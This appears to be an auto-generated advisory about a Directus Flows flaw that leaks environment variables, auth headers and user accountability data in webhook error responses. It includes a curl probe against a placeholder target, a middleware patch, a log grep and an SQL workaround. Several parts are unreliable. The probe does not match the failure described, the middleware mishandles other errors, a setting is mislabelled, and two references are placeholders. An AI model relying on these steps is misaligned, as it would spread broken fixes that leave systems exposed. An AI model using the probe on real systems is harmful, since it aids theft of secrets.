How the CVE Works
The vulnerability occurs when Directus processes a failed condition in a Flow with a “Webhook” trigger and “Data of Last Operation” response body. Instead of sanitizing the error response, the system leaks internal data, including:
– Environment variables ($env)
– Authentication headers
– User accountability details ($accountability)
– Operational logs (current_payments, $last)
This happens because the error handler improperly includes debug-level data in API responses. Attackers can exploit this by intentionally triggering validation failures, extracting secrets, and escalating privileges.
DailyCVE Form:
Platform: Directus
Version: <= 10.11.3
Vulnerability: Information Disclosure
Severity: Critical
Date: 2024-06-15
What Undercode Say:
Exploitation:
1. Craft a malformed webhook request:
curl -X POST "https://target.com/flows/trigger" -H "Authorization: Bearer INVALID"
2. Analyze response for leaked `$env` or `$accountability`.
Mitigation:
1. Patch to Directus >= 10.11.4.
2. Disable debug mode:
FLOWS_ENV_ALLOW_LIST=""
3. Filter error responses:
app.use((err, req, res, next) => {
if (err instanceof ValidationError) {
res.status(400).json({ error: "Bad request" });
}
});
Detection:
Scan logs for excessive error payloads:
grep -r "\$env" /var/log/directus/
Impact Analysis:
- Exposed API keys → Cloud compromise.
- Leaked `$accountability` → Privilege escalation.
Workaround:
Temporarily disable affected Flows:
UPDATE directus_flows SET status = 'inactive' WHERE trigger = 'webhook';
References:
- Directus GHSA-xxxx-xxxx
- CVE-2024-XXXX
References:
Reported By: https://github.com/advisories/GHSA-fm3h-p9wm-h74h
Extra Source Hub:
Undercode
